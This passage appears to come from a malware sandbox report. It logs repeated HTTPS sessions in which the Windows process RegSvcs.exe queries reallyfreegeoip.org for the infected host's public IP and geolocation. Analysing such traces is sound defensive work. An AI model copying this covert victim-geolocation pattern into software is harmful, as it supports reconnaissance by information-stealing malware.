2024-11-18 17:21:25 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49717	188.114.96.3	443	7364	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 17:21:26 UTC	87	OUT	GET /xml/155.94.241.187 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-18 17:21:26 UTC	851	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:21:26 GMT Content-Type: text/xml Content-Length: 358 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 554 Last-Modified: Mon, 18 Nov 2024 17:12:12 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PWpCx49fgXIbpeuRCTCPs2ZDcFyhy5Z3z8%2Bt7xutytzzFGM%2BbRM3MD%2FvqSBJZI7yXRWt4lzkiVXLL%2BwrOf5DUfW7MIclCym73S9T61Rb9ep4r991AX4%2FbSK3vR4ODH6yC6AlmTdj"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e49a30e58f02322-ORD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=23536&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=123323&cwnd=32&unsent_bytes=0&cid=8c394b019f872736&ts=185&x=0"
2024-11-18 17:21:26 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49719	188.114.96.3	443	7364	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 17:21:28 UTC	87	OUT	GET /xml/155.94.241.187 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-18 17:21:28 UTC	845	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:21:28 GMT Content-Type: text/xml Content-Length: 358 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 556 Last-Modified: Mon, 18 Nov 2024 17:12:12 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8XCn51o1R6puDtBhlambcR%2BSS7BN8OL7cwC8%2BJauKCxOUMCQma0XgMKLGLupisjZeUKDOZMON32VPRBoNfKRBCH8wJ8dsqqZANoljtCnKi7thNjuwo1nnzj6lpROxDiqYIuawUb1"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e49a3196b56231c-ORD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=23506&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=123082&cwnd=32&unsent_bytes=0&cid=16ede01376c3628f&ts=225&x=0"
2024-11-18 17:21:28 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49725	188.114.96.3	443	7740	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 17:21:30 UTC	87	OUT	GET /xml/155.94.241.187 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-18 17:21:30 UTC	853	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:21:30 GMT Content-Type: text/xml Content-Length: 358 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 558 Last-Modified: Mon, 18 Nov 2024 17:12:12 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3hTABSMM6slkGJDwvxoEtw%2BGAe%2FMibojiZtBH5cMijQk86gzRysdS0T4BYuiZriUXjlsEP8n8TCXXGD%2FPyegRE1hDm6ENsBUVLgfO9Gm9P7JJ6eU1wLVrB%2Bd%2FQwEToV%2FpmMaqvd5"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e49a3245ab02bc4-ORD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=24895&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=701&delivery_rate=117095&cwnd=32&unsent_bytes=0&cid=52890ea7b4146b9a&ts=249&x=0"
2024-11-18 17:21:30 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49726	188.114.96.3	443	7364	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 17:21:30 UTC	63	OUT	GET /xml/155.94.241.187 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-18 17:21:30 UTC	847	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:21:30 GMT Content-Type: text/xml Content-Length: 358 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 558 Last-Modified: Mon, 18 Nov 2024 17:12:12 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YHnbiiZZXpSXmS54uqXgyIGukwMoEm4gd7SoOGp%2F8XlgxsTFDymYqur1sMZBlQEsnITK%2FUDNa8YWhBHjNRrzuVDs5VXRGo5lMXsjml9xW38Jw5URfnP%2FxQZ8r2edLPmkQe55Rv7j"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e49a324688722c8-ORD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=23785&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=118131&cwnd=32&unsent_bytes=0&cid=866f6794759e6e1a&ts=180&x=0"
2024-11-18 17:21:30 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49731	188.114.96.3	443	7740	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 17:21:31 UTC	63	OUT	GET /xml/155.94.241.187 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-18 17:21:31 UTC	847	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:21:31 GMT Content-Type: text/xml Content-Length: 358 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 559 Last-Modified: Mon, 18 Nov 2024 17:12:12 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W14Kp1o1tI0rzbEGAI5mQMtX5sBwdeZ3q8xAOt09TaPFuwDjONf7XWhLmwTAeEDMouI%2BjAJRAb7yWMD4IUfOFM7zO3D4tFQ%2FJPrtPeTlZTGWNh%2FQFhvrvjPNK6AmQ0jijDH3iUii"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e49a32b3bbd22e6-ORD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=23599&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=122628&cwnd=32&unsent_bytes=0&cid=64b4a7d3eba39952&ts=183&x=0"
2024-11-18 17:21:31 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49732	188.114.96.3	443	7364	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 17:21:31 UTC	63	OUT	GET /xml/155.94.241.187 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-18 17:21:32 UTC	843	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:21:32 GMT Content-Type: text/xml Content-Length: 358 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 560 Last-Modified: Mon, 18 Nov 2024 17:12:12 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w0P6XZTWKg4kG080ekDcP58CVxESgCUNGQj9n8TfM2etLsbWNrUogbAF4MvvHjifFVZhOmswUqNART0mpWpJ8v73ykqXgZSZAR2%2BfRjefZQ4PT8F3gG9m1ijtoHdpS80qW8Nm8Ok"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e49a32f3ae3629f-ORD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=24543&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=118045&cwnd=32&unsent_bytes=0&cid=83b8618675b71414&ts=183&x=0"
2024-11-18 17:21:32 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49741	188.114.96.3	443	7740	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 17:21:33 UTC	63	OUT	GET /xml/155.94.241.187 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-18 17:21:33 UTC	855	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:21:33 GMT Content-Type: text/xml Content-Length: 358 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 51967 Last-Modified: Mon, 18 Nov 2024 02:55:26 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5994XdqOpN%2FH6d5nItlOsFclUWm5QmQIgQia2e0%2BszGROIF0fZiiOGjlvQ6ByKQGybjlT6eEc4es03DooE9%2FMX2dGvFGoj%2Fbp8lS8ryt1z8uAQmLF%2Ffd%2Br1YxaRGsIvU52nsxv8w"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e49a3382ff7e76f-DEN alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=18859&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=153495&cwnd=32&unsent_bytes=0&cid=4365e0d97803e991&ts=429&x=0"
2024-11-18 17:21:33 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49742	188.114.96.3	443	7364	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 17:21:34 UTC	87	OUT	GET /xml/155.94.241.187 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-18 17:21:34 UTC	854	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:21:34 GMT Content-Type: text/xml Content-Length: 358 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 6532 Last-Modified: Mon, 18 Nov 2024 15:32:42 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ueIhWT8rLmmar6lru81oJmPl7Vzs0qdORvPPgp2bLuAU4iv%2B2o69n5JP9oGt%2BHo6pJpQKUD%2Bl%2FjI%2B9JFn2uwwA0DTl4yRgNbA9mPpSdYZ1PEIPfSC1BIVQvVK52u32TbKaj%2F0wjW"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e49a33c2bca44e4-ATL alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=17388&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=166417&cwnd=32&unsent_bytes=0&cid=0e1be72630b75640&ts=191&x=0"
2024-11-18 17:21:34 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49754	188.114.96.3	443	7740	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 17:21:35 UTC	87	OUT	GET /xml/155.94.241.187 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-18 17:21:35 UTC	848	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:21:35 GMT Content-Type: text/xml Content-Length: 358 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 6533 Last-Modified: Mon, 18 Nov 2024 15:32:42 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Syfe2HUmYN2eEcWN5Kwowi2jjZ9pfOWXJtLQYWZi5EfA8iGtgotDDKOZEMnjGVaK0pUtOt%2FC1Qx%2BPwOGh21c4w8qonwYZbUWTztdctVfN1ddL3HQeuExINIqGHs6%2F3Us0St17byQ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e49a342f9f053be-ATL alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=19996&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=144836&cwnd=32&unsent_bytes=0&cid=bab9ac4dc596afda&ts=179&x=0"
2024-11-18 17:21:35 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49762	188.114.96.3	443	7740	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 17:21:36 UTC	87	OUT	GET /xml/155.94.241.187 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
